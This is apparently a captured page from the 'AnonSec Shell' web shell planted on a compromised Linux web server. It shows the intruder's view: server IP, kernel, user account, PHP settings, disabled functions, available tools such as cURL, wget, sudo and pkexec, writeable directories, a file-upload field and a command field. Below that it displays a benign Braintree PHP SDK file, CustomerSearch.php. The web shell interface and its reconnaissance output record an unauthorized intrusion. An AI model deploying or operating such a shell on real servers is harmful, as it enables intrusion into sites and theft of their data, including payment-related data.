AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.192
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_apps/leve/vendor/braintree/braintree_php/lib/Braintree/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_apps/leve/vendor/braintree/braintree_php/lib/Braintree//CustomerSearch.php
<?php
namespace Braintree;

class CustomerSearch
{
    public static function addressCountryName()               { return new TextNode('address_country_name'); }
    public static function addressExtendedAddress()           { return new TextNode('address_extended_address'); }
    public static function addressFirstName()                 { return new TextNode('address_first_name'); }
    public static function addressLastName()                  { return new TextNode('address_last_name'); }
    public static function addressLocality()                  { return new TextNode('address_locality'); }
    public static function addressPostalCode()                { return new TextNode('address_postal_code'); }
    public static function addressRegion()                    { return new TextNode('address_region'); }
    public static function addressStreetAddress()             { return new TextNode('address_street_address'); }
    public static function cardholderName()                   { return new TextNode('cardholder_name'); }
    public static function company()                          { return new TextNode('company'); }
    public static function email()                            { return new TextNode('email'); }
    public static function fax()                              { return new TextNode('fax'); }
    public static function firstName()                        { return new TextNode('first_name'); }
    public static function id()                               { return new TextNode('id'); }
    public static function lastName()                         { return new TextNode('last_name'); }
    public static function paymentMethodToken()               { return new TextNode('payment_method_token'); }
    public static function paymentMethodTokenWithDuplicates() { return new IsNode('payment_method_token_with_duplicates'); }
    public static function paypalAccountEmail()               { return new IsNode('paypal_account_email'); }
    public static function phone()                            { return new TextNode('phone'); }
    public static function website()                          { return new TextNode('website'); }

    public static function creditCardExpirationDate()         { return new EqualityNode('credit_card_expiration_date'); }
    public static function creditCardNumber()                 { return new PartialMatchNode('credit_card_number'); }

    public static function ids()                              { return new MultipleValueNode('ids'); }

    public static function createdAt()                        { return new RangeNode("created_at"); }
}
class_alias('Braintree\CustomerSearch', 'Braintree_CustomerSearch');

Anon7 - 2022
AnonSec Team